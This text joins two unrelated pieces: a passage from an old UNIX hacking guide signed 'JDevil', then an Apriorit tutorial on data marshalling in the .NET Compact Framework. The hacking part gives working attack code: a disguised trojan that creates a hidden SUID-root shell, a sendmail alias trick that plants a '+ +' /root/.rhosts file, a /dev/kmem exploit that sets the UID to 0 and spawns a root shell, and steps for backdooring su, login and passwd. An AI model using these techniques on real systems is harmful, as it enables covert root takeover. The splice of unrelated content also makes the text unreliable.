#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual memory of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in the code but you get the idea.

[GUIDE] Marshalling data in Compact Framework

Author: Apriorit (Device Team)
Permanent link: apriorit(dot)com/our-company/dev-blog/62-marshalling-data-in-cf
When we build applications for embedded systems or mobile platforms we often cannot write every part of the product in managed code.
Some modules have to be native because they perform low-level operations, or because the libraries already exist in C++. The product therefore mixes programming languages, and data has to be marshaled between them.
This article reviews how data types behave when they are marshaled to and from unmanaged code in the .NET Compact Framework, and the pitfalls that follow from it.
Making your interop calls more efficient
Marshaling is the act of moving data from one environment to another. In .NET it means transferring data out of the app domain you are in to somewhere outside it, here to native code.
Platform Invoke calls are slower than both direct native calls and ordinary managed calls. The cost depends on which types are marshaled between managed and native code, so avoid Platform Invoke where you can. When you must cross the boundary, prefer one call that moves a larger amount of data over several "small" Platform Invoke calls.
Blittable types
Prefer simple data types (int, byte, bool, char and string). They make the call more efficient and avoid conversions and copying, because such blittable types have the same representation in managed and unmanaged memory. Remember, though, the Compact Framework's own rules: a bool is marshaled as a 1-byte integer (the full .NET Framework uses a 4-byte BOOL by default), a char is always a 2-byte Unicode character, and a String is always passed as a Unicode (UTF-16) array (the full .NET Framework can pass it as Unicode, ANSI or a BSTR).
Method Inlining
The JIT compiler can inline small methods to make calls cheaper. You cannot force a method to be inlined, but you can prevent it. A method is not inlined if you:
• make it virtual;
• add branching to its body;
• define local variables in it;
• use 32-bit floating-point (float) arguments or a float return value.
Disabling inlining can help to localise a problem in a Platform Invoke call, because the failing method then shows up as its own frame instead of being folded into its caller.
Sequential layout
In the Compact Framework all structures and classes have sequential layout: the managed type has the same member order as the unmanaged structure. In the full .NET Framework this is what the attribute LayoutKind.Sequential specifies. You do not have to set the attribute in the Compact Framework, but if the same code is compiled for both frameworks set it explicitly so that the two platforms behave the same.
The following sample shows how to pass two pointers from C# to the native module so that it can store them.
Code C#:
Code:
[StructLayout(LayoutKind.Sequential)]
public class BasePointers // a struct works too
{
public IntPtr pointer1;
public IntPtr pointer2;
}
// Winapi is the only supported convention and means Cdecl on this platform
[DllImport("NativeDLL.dll", CallingConvention = CallingConvention.Winapi)]
public static extern int TransferStruct(BasePointers pointers);
Code C++:
Code:
// IntPtr is 32 bits on Windows Mobile, so unsigned int matches it here
struct BasePointers
{
unsigned int pointer1;
unsigned int pointer2;
};
// same name and parameter as the managed declaration
extern "C" __declspec(dllexport) int CDECL TransferStruct(BasePointers* pointers);
One Calling Convention
The calling convention determines the order in which parameters are passed to the function and who is responsible for cleaning up the stack. The .NET Compact Framework supports only the Winapi value of CallingConvention, which on this platform means Cdecl, the convention of C and C++ (the full .NET Framework supports three different conventions). Make sure the managed and native declarations agree: a mismatch corrupts the stack and crashes the application.
With the default [PreserveSig] behaviour the native return value is passed through unchanged, so a native function that returns a 32-bit HRESULT hands you the error code to analyse instead of hiding it. The convention is set with the CallingConvention attribute (UnmanagedFunctionPointer for delegates); as noted, only "Winapi", meaning Cdecl, is supported:
Code C#:
Code:
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate int ProgressEventHandler(int progressValue);
Code C++:
Code:
// return type and parameter must match the managed delegate exactly
typedef int (CDECL *ProgressEventHandler)(int progressValue);
Data Alignment
Sometimes data has to cross between managed and unmanaged code inside structures. As written above, all structures have sequential layout in the Compact Framework, but you also have to think about how the members are laid out in memory on each side. Packing depends on the platform and on how members are aligned. On ARM every member of a structure is aligned to 4 bytes.
Code:
typedef struct OurStruct
{
unsigned char valueChar; // offset 0
unsigned int valueInt;   // offset 4 on ARM: three padding bytes follow valueChar
} ourStruct_;
This structure is perfectly acceptable in desktop code, but on the Windows Mobile (ARM) platform valueInt sits at offset 4, not 1, and sizeof(OurStruct) is 8. If you exchange such structures between desktop and device code, both sides have to agree on exactly this layout during marshaling.
During marshaling you may see errors such as "Datatype misalignment" (0x80000002) or "Access violation" (0xC0000005). They indicate that you are using a wrong pointer or reading at a wrong offset. For example, you pass an array of bytes from C# to the native module and declare the functions as:
C# code:
Code:
[DllImport("NativeDLL.dll", CallingConvention = CallingConvention.Winapi)]
// Cdecl
public static extern int TransferArray(IntPtr src, int srcSize);
C++ Native Module code:
Code:
extern "C" __declspec(dllexport) int CDECL TransferArray(byte* srcArr,
int srcSize);
If you treat srcArr as a pointer to int (int*) and dereference it, the ARM processor faults on any address that is not a multiple of 4:
Code:
int value = *(int*)srcArr; // Datatype misalignment
The simple way around it is to change the C++ declaration from a pointer to bytes to a pointer to ints and pass an int array from the managed side. Note that the declaration alone does not make memory aligned: the buffer you pass must itself start on a 4-byte boundary and you must only read at multiples of 4 from it.
Code:
extern "C" __declspec(dllexport) int CDECL TransferArray(int* srcArr,
int srcSize);
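The layout and misalignment points from the two sections above, as an added example that is not code from the Apriorit article: it reports the offsets the managed side must reproduce for OurStruct, shows a memcpy-based read that works at any offset (on ARM a cast-and-dereference at an odd address faults), and hardens the native side of the TransferArray example with the size validation a native entry point should perform before touching a buffer that managed code handed it. The std::vector output parameter, the -1 error convention and the sample bytes are assumptions of this example. Built on an x86 desktop the raw cast would not fault, so the example asserts the alignment instead of triggering the fault.

```cpp
// Added example (not from the Apriorit article): struct layout facts plus an
// alignment-safe, bounds-checked native side for TransferArray.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

// Same structure as in the article (typo fixed).
struct OurStruct {
    unsigned char valueChar;
    unsigned int  valueInt;   // lands at offset 4: the compiler pads after valueChar
};

// Layout facts the managed declaration has to match.
size_t ourStructIntOffset() { return offsetof(OurStruct, valueInt); }
size_t ourStructSize()      { return sizeof(OurStruct); }

// Reading an int through a cast pointer is only safe when the address is a
// multiple of alignof(int); ARM raises STATUS_DATATYPE_MISALIGNMENT otherwise.
bool isAlignedForInt(const void* p) {
    return (reinterpret_cast<uintptr_t>(p) % alignof(int)) == 0;
}

// Alignment-safe read: memcpy lets the compiler emit byte loads where it has
// to, so this works at any offset on any CPU.
int readIntAt(const unsigned char* src, size_t offset) {
    int v;
    std::memcpy(&v, src + offset, sizeof v);
    return v;
}

// Native side of TransferArray(byte* srcArr, int srcSize), hardened: validate
// the length before reading so a short, odd or negative srcSize from the
// managed caller cannot cause an out-of-bounds or partial read.
// Returns the number of ints decoded, or -1 on a bad argument (assumed convention).
int TransferArray(const unsigned char* srcArr, int srcSize, std::vector<int>& out) {
    const int intSize = static_cast<int>(sizeof(int));
    if (srcArr == nullptr || srcSize < 0) return -1;
    if (srcSize % intSize != 0) return -1;          // trailing partial int
    out.clear();
    for (int off = 0; off < srcSize; off += intSize) {
        out.push_back(readIntAt(srcArr, static_cast<size_t>(off)));
    }
    return static_cast<int>(out.size());
}

// Constructed sample: the bytes of three ints as a managed byte[] would carry
// them, shifted by one byte so the buffer start is deliberately misaligned.
bool selfCheck() {
    alignas(4) unsigned char raw[16] = {0};
    const int vals[3] = {1, 2, -3};
    std::memcpy(raw + 1, vals, sizeof vals);
    if (!isAlignedForInt(raw))     return false;     // raw itself is aligned
    if (isAlignedForInt(raw + 1))  return false;     // raw + 1 is not
    std::vector<int> out;
    if (TransferArray(raw + 1, 12, out) != 3) return false;   // memcpy path copes
    if (out[0] != 1 || out[1] != 2 || out[2] != -3) return false;
    if (TransferArray(raw + 1, 13, out) != -1) return false;  // partial int rejected
    if (TransferArray(nullptr, 12, out) != -1) return false;  // null rejected
    if (TransferArray(raw, -4, out) != -1) return false;      // negative rejected
    return true;
}

int main() {
    std::printf("valueInt at offset %zu, sizeof(OurStruct) = %zu, self-check %s\n",
                ourStructIntOffset(), ourStructSize(), selfCheck() ? "ok" : "FAILED");
    return selfCheck() ? 0 : 1;
}
```

The managed side of this contract would be a struct with the same two fields under LayoutKind.Sequential, or a byte[] whose length is a multiple of four; the point of the size check is that the native DLL cannot trust srcSize any more than it can trust the alignment of srcArr.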
Marshal class
The methods of the Marshal class let you convert managed objects by hand and move between IntPtrs: PtrToStructure, GetComInterfaceForObject, PtrToStringBSTR, GetFunctionPointerForDelegate and others. They give you control over marshaling, and they are also useful when debugging a parameter the runtime cannot convert by itself.
You cannot pass a delegate directly to the native module as a function parameter, because the .NET Compact Framework does not support marshaling of delegates. Instead, obtain a function pointer with Marshal.GetFunctionPointerForDelegate, pass that to native code and let native code call it.
Code:
class MainClass
{
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate int ProgressEventHandler(int progressValue);
// keeps the delegate reachable while native code holds the function pointer
private ProgressEventHandler progressHandler;
...
int OnProgressChanged(int progressValue) // signature must match the delegate
{
...
}
…
[DllImport("NativeDLL.dll", CallingConvention = CallingConvention.Winapi)]
// Cdecl
public static extern int SetCallbackFunction(IntPtr functionPointer);
void RegisterCallback()
{
// Passing function pointer
progressHandler = new ProgressEventHandler(OnProgressChanged);
IntPtr progressChanged = Marshal.GetFunctionPointerForDelegate(progressHandler);
int result = SetCallbackFunction(progressChanged);
}
}
Be aware of the garbage collector (GC) here. The GC may collect your delegate, and then the function pointer you handed out becomes invalid. This happens when the pointer is passed to native code as a callback to be invoked later: from the managed side nothing references the delegate any more, so the GC considers it garbage. To avoid it, keep a reference to the delegate, for example in a field of the class or in a pool that holds references to several delegates.
GCHandle
Since we are passing a pointer to data, we have to allocate memory for that data and make sure the GC neither moves nor frees it while native code uses it. One way to manage this is GCHandle.
If you want to pass a class (or an array of bytes) to unmanaged code and need its memory pinned for as long as the unmanaged side works with it, you can write:
Code:
class SampleClass
{
...
}
SampleClass classSample = new SampleClass();
// pin the object so the GC cannot move or collect it while native code uses the address
GCHandle classHandle = GCHandle.Alloc(classSample, GCHandleType.Pinned);
IntPtr ptrToClass = classHandle.AddrOfPinnedObject();
int result = PassPtrToUnmanagedCode(ptrToClass); // our function
classHandle.Free(); // unpin once native code no longer needs the memory
You can also keep the GCHandle as a member of the class so that the pinned object outlives the method. Remember that a structure is a value type: pinning one with GCHandle.Alloc boxes a copy, and the handle then refers to that boxed copy, not to your variable, so whatever native code writes ends up in the copy. Such a problem is hard to find later.
Conclusion
During marshaling you may run into the problems described above; very often they surface as a "NotSupportedException" or another exception. To track one down you can enable the Compact Framework's logging by setting its registry keys. One of the logging components is "Interop"; its log records Platform Invoke calls and marshaling. See MSDN on creating log files for the details.
With the .NET Compact Framework 2.0 you can use Platform Invoke calls in a managed application, even though there are some limitations. Keep the differences and limitations between the full .NET Framework and the Compact Framework in mind to avoid problems in your applications.
